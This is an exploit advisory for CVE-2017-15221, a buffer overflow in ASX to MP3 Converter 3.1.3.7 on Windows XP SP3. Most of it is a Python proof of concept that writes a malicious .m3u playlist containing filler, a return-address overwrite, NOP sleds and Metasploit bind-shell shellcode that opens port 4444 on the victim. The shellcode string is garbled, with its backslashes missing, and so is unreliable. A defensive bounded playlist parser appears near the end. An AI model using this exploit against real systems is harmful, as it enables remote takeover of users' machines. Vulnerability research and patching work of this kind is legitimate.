# Exploit Title: Buffer Overflow via crafted malicious .m3u file


# Exploit Author: Parichay Rai

# Tested on: XP Service Pack 3

# CVE : CVE-2017-15221

Description
------------

A buffer overflow attack is possible because the .m3u playlist parser does not validate the length of the input it reads.

Proof of Concept
----------------

#!/usr/bin/python

# This exploit generates a malicious playlist for the ASX to MP3 Converter 3.1.3.7.2010.
# This is an exploit that works well against Windows XP SP3 systems.
# Successful exploitation gives you a bind shell on port 4444.

BadChar = "\x00\x0a\x0d\x20"  # bytes the encoder must avoid in the payload

# Payload Generation Command: msfpayload windows/shell_bind_tcp EXITFUNC=none R | msfencode -a x86 -b "\x00\x0a\x0d\x20" -f c

# Successful exploitation opens port 4444 on the victim machine

shellcode=("xd9xeexbfxadx07x92x3exd9x74x24xf4x5ex2bxc9" +
"xb1x56x31x7ex18x03x7ex18x83xc6xa9xe5x67xc2" +
"x59x60x87x3bx99x13x01xdexa8x01x75xaax98x95" +
"xfdxfex10x5dx53xebxa3x13x7cx1cx04x99x5ax13" +
"x95x2fx63xffx55x31x1fx02x89x91x1excdxdcxd0" +
"x67x30x2ex80x30x3ex9cx35x34x02x1cx37x9ax08" +
"x1cx4fx9fxcfxe8xe5x9ex1fx40x71xe8x87xebxdd" +
"xc9xb6x38x3ex35xf0x35xf5xcdx03x9fxc7x2ex32" +
"xdfx84x10xfaxd2xd5x55x3dx0cxa0xadx3dxb1xb3" +
"x75x3fx6dx31x68xe7xe6xe1x48x19x2bx77x1ax15" +
"x80xf3x44x3ax17xd7xfex46x9cxd6xd0xcexe6xfc" +
"xf4x8bxbdx9dxadx71x10xa1xaexdexcdx07xa4xcd" +
"x1ax31xe7x99xefx0cx18x5ax67x06x6bx68x28xbc" +
"xe3xc0xa1x1axf3x27x98xdbx6bxd6x22x1cxa5x1d" +
"x76x4cxddxb4xf6x07x1dx38x23x87x4dx96x9bx68" +
"x3ex56x4bx01x54x59xb4x31x57xb3xc3x75x99xe7" +
"x80x11xd8x17x37xbex55xf1x5dx2ex30xa9xc9x8c" +
"x67x62x6exeex4dxdex27x78xd9x08xffx87xdax1e" +
"xacx24x72xc9x26x27x47xe8x39x62xefx63x02xe5" +
"x65x1axc1x97x7ax37xb1x34xe8xdcx41x32x11x4b" +
"x16x13xe7x82xf2x89x5ex3dxe0x53x06x06xa0x8f" +
"xfbx89x29x5dx47xaex39x9bx48xeax6dx73x1fxa4" +
"xdbx35xc9x06xb5xefxa6xc0x51x69x85xd2x27x76" +
"xc0xa4xc7xc7xbdxf0xf8xe8x29xf5x81x14xcaxfa" +
"x58x9dxa0xc0x80xbfxdcx6cxd1xfdx80x8ex0cxc1" +
"xbcx0cxa4xbax3ax0cxcdxbfx07x8ax3exb2x18x7f" +
"x40x61x18xaa")

buffer = "http://"
buffer += "A" * 17417             # filler up to the saved return address
buffer += "\x53\x93\x42\x7e"      # overwrites EIP on Windows XP SP3 with an address in user32.dll
buffer += "\x90" * 10             # NOPs
buffer += shellcode
buffer += "\x90" * 10             # NOPs

with open("exploit.m3u", "w") as f:
    f.write(buffer)

Affected Targets
----------------

ASX to MP3 Converter version 3.1.3.7 and possibly earlier versions


Solution
---------------

Validate input to prevent unexpected data from being processed, such as entries that are too long, of the wrong data type, or containing "junk" characters.
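The following bounded .m3u reader illustrates the advice above. It is an added example, not code from this advisory or from the ASX to MP3 Converter; MAX_ENTRY_LEN is an assumed limit (the converter's real buffer size is not documented here), and the two sample playlists are constructed, with the hostile one mirroring only the shape of the PoC entry (filler plus a 4-byte marker, no payload).

```python
import re

# Assumed upper bound on a single playlist line; the real converter's
# internal buffer size is not stated in the advisory.
MAX_ENTRY_LEN = 2048

# Media entries must consist of printable ASCII only (no control bytes).
PRINTABLE = re.compile(r'^[\x20-\x7e]+$')


class PlaylistError(ValueError):
    """Raised when an .m3u playlist fails validation."""


def parse_m3u(text):
    """Return the media entries of an .m3u playlist, rejecting unsafe lines.

    Every line is length-checked before anything else is done with it, so an
    oversized entry is refused rather than copied into a fixed-size buffer.
    Directive and comment lines (#EXTM3U, #EXTINF:...) are otherwise skipped.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if len(line) > MAX_ENTRY_LEN:
            raise PlaylistError("line %d: %d bytes exceeds limit of %d"
                                % (lineno, len(line), MAX_ENTRY_LEN))
        if line.startswith('#'):
            continue
        if not PRINTABLE.match(line):
            raise PlaylistError("line %d: non-printable characters" % lineno)
        entries.append(line)
    return entries


def check_playlist(text):
    """Wrap parse_m3u() into an (ok, result_or_reason) pair for callers."""
    try:
        return True, parse_m3u(text)
    except PlaylistError as err:
        return False, str(err)


# Constructed sample input: a benign playlist and an oversized entry with the
# same layout as the PoC ("http://" + 17417 filler bytes + 4-byte marker).
BENIGN = "#EXTM3U\n#EXTINF:123,Example track\nhttp://example.invalid/track.mp3\n"
HOSTILE = "http://" + "A" * 17417 + "BBBB"
```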


Credits
----------

Offensive Security
Rebellious Ceaser